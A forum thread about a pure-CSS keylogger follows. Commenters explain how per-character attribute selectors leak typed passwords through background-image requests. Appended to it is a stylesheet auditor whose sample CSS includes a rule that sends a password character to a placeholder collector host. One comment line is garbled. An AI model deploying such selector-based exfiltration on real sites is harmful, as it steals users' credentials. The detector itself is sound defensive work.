Comments
-
peiche3037y
It's possible because it makes a request through the background-image. If the property changes (like when the selector which didn't match an element suddenly does by wildcards), a new request could be made. So you can make a different selector for each letter, and monitor the sequence of calls to your server. Voila, keylogger.
-
lotd77757y
@Vip3rDev for each character input into a type=password,
it requests a background image that's probably blank..
I'm almost always curiously peeking the network tab, so I would probably see it..
Guess I could use it against, by visiting from a bunch of machines, crunching through a wordlist :p
-
webnoob11027y
@peiche – I understand _how_ it works. I meant "from a security standpoint, how could the potential of this breach not have raised flags earlier."
-
Oh, I get what you mean @lotd, I typically have dev tools open when browsing too just from habit. But now I have even more reason to pay attention to the network tab!
-
drekhi18027y
Shit those motherfuckers were right who were saying CSS is a programming language. 😅😕🤔🤐
-
gitgood07y
Just before people start worrying about this, just know that for this to actually be exploited the malicious user would have to have access to the javascript/css being served from the contaminated page. If they do have this access, then there are much bigger issues to worry about.
The most "straightforward" and realistic scenario I could ever think of this being used is if Bob uses a CSS library that contains the contaminated code that makes the key logging requests to the malicious server? I'm not sure it's something to be worried about, just cautious of!
-
@gitgood
> access to the javascript/css being served from the contaminated page
You mean like all advertisements on the web?
@lotd Many websites continuously fire off ajax requests, and it could look a lot more obfuscated.
@CapnHammered Most users don't have totally random passwords. If it logs "ChdrlCharlie123" I could guess the pet name, and where the backspacing happened...
-
https://instagram.com.”s to affect controlled components like React. It also states it in the repo “Open a website that uses a controlled component framework such as React. https://instagram.com.”
K but why is this even possible through CSS...
Linked below is a pure CSS keylogger, i.e., now you can get your passwords stolen through a stylesheet. Keep your head on a swivel kids.
https://github.com/maxchehab/...
rant
css
keylogger
security
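
The mechanism described in the comments (one value-attribute selector per character, each triggering a background-image request) can be looked for in the stylesheets a page loads. The following is an added example, not part of the thread or the linked repo: a small auditor that flags such rules when their `url()` points off-origin. The sample CSS, hostnames and function name are constructed for illustration.

```javascript
// Added example: flags CSS rules that key off an input's value attribute and fetch a remote URL.
// Constructed sample stylesheet; the hosts are placeholders, not taken from the thread.
const SAMPLE_CSS = `
/* ordinary site rules */
.logo { background-image: url("/img/logo.png"); }
input[type="checkbox"][value="yes"] { outline: 1px solid green; }
@media screen {
  input[type="password"][value$="a"] { background-image: url("https://collector.example/a"); }
}
input[value^="x"] { background: url(data:image/gif;base64,R0lGOD) ; }
`;

// Attribute selector on `value` with any match operator (=, ^=, $=, *=, ~=, |=).
const VALUE_SELECTOR = /\[\s*value\s*[\^$*~|]?=/i;
const URL_FN = /url\(\s*(['"]?)(.*?)\1\s*\)/gi;

function auditStylesheet(cssText, pageUrl) {
  const pageOrigin = new URL(pageUrl).origin;
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, ""); // drop comments
  const findings = [];
  // Innermost "selector { declarations }" pairs; rules nested in @media are still matched.
  for (const [, selector, body] of css.matchAll(/([^{}]+)\{([^{}]*)\}/g)) {
    if (!VALUE_SELECTOR.test(selector)) continue;
    const remote = [];
    for (const [, , raw] of body.matchAll(URL_FN)) {
      let target;
      try { target = new URL(raw, pageUrl); } catch { continue; }
      // Only http(s) URLs cause a network request; data: URIs stay local.
      if (!/^https?:$/.test(target.protocol)) continue;
      if (target.origin !== pageOrigin) remote.push(target.href);
    }
    if (remote.length) findings.push({ selector: selector.trim(), remote });
  }
  return findings;
}

const findings = auditStylesheet(SAMPLE_CSS, "https://shop.example/login");
for (const f of findings) console.log(`${f.selector} -> ${f.remote.join(", ")}`);
```

A Content-Security-Policy with restrictive `style-src` and `img-src` directives limits which stylesheets load and where their `url()` image requests can go, which covers the third-party CSS case raised in the comments.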